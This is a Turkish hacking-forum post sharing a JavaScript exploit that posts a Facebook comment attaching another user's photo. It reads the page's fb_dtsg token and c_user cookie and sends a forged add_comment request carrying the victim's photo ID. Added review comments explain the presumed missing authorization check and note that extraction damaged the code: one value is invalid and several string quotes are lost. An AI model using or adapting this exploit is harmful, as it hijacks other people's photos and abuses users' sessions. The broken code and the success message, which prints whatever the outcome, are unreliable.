Facebook Comment's Picture Hijacking

yellowclass381

Ahmaat' Alıntı:
[hide] eyw

-----Javascript Facebook Picture Hijack PoC----

// Inputs for the PoC. Both IDs are redacted on the page (XXXXXXXXXX), so the
// listing cannot run as shown.
var yourMessage = "check out my pic"; // your msg
// Described by the author as another user's photo; it is sent later as the
// attached_photo_fbid request parameter.
var photofbID = XXXXXXXXXX; // victim photo ID
var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack

/**
 * Builds the "phstamp" request parameter from the request body and the
 * fb_dtsg token.
 *
 * @param {string} b - request body; only its length is used.
 * @param {string} g - fb_dtsg token; its character codes are accumulated.
 * @returns {string} '1' followed by the accumulated value and the body length.
 *
 * NOTE(review): every input is already held by the client (the body it built
 * and the token read from the page), so the result is a derived checksum, not
 * a secret. It cannot distinguish a request made by the site's own UI from one
 * scripted inside the same logged-in session.
 */
function generatePhstamp(b, g) {
var f = b.length;
// NOTE(review): the initial value on the next line was lost in extraction
// ("--" is not valid JavaScript), so the page does not show whether the loop
// sums the character codes or concatenates them. The name is also assigned
// without a declaration, which makes it an implicit global.
numeric_csrf_value = --;
for (var c = 0; c < g.length; c++) {
numeric_csrf_value += g.charCodeAt(c)
}
return '1' + numeric_csrf_value + f
}
// Builds and sends one comment POST from inside the logged-in user's own page
// context.
// NOTE(review): several string delimiters in this run were lost in extraction,
// so it is not valid JavaScript as shown.
//
// e: the anti-CSRF token (fb_dtsg), read from a form field of the current page.
// Because the script runs in the user's own session with a valid token, CSRF
// protection is not the control being tested here.
var e = document.getElementsByName('fb_dtsg')[0].value,
// c: the user id, taken from the c_user cookie.
c = document.cookie.split('c_user=-)[1].split(-;-)[0],
// h: form-encoded request body. The parameter that matters for defenders is
// attached_photo_fbid, which carries a photo ID chosen by the client.
// NOTE(review): presumably the server accepted that ID without checking that
// the commenter is allowed to attach the photo (a missing object-level
// authorization check). The page shows no server response, so confirm.
h = "ft_ent_identifier=-+statuslinkID+-&comment_text=-+yourMessage +-&source=1&client_id=1371674471412:1000847939&attached_photo_fbid=-+photofbID+-&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=- + c + -&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=- + e;
// m: checksum over the body length and the token (see generatePhstamp),
// appended as the phstamp parameter. m and picture are implicit globals.
m = generatePhstamp(h, e);
h += -&phstamp=- + m;
picture = new XMLHttpRequest();
picture.open("POST", "https://www.facebook.com/ajax/ufi/add_comment.php", true);
// The body is form-encoded but is labelled application/x-javascript.
picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8");
picture.send(h);
// The request is asynchronous and no response handler is registered, so the
// message below is printed unconditionally. It is not evidence that the server
// accepted the comment.
console.log("The pic has been Hijacked & posted at http://facebook.com/-+statuslinkID);


VİDEO ; [video=youtube]

[/hide]

Gönül İsterdi, Ben Çekmek İsterdim Ama Maalesef Zamanım Olmuyor. Videodaki İşlemleri Yapın. Kolay Gelsin Arkadaşlar, Zevkli Geçmesi Dileğiyle..
 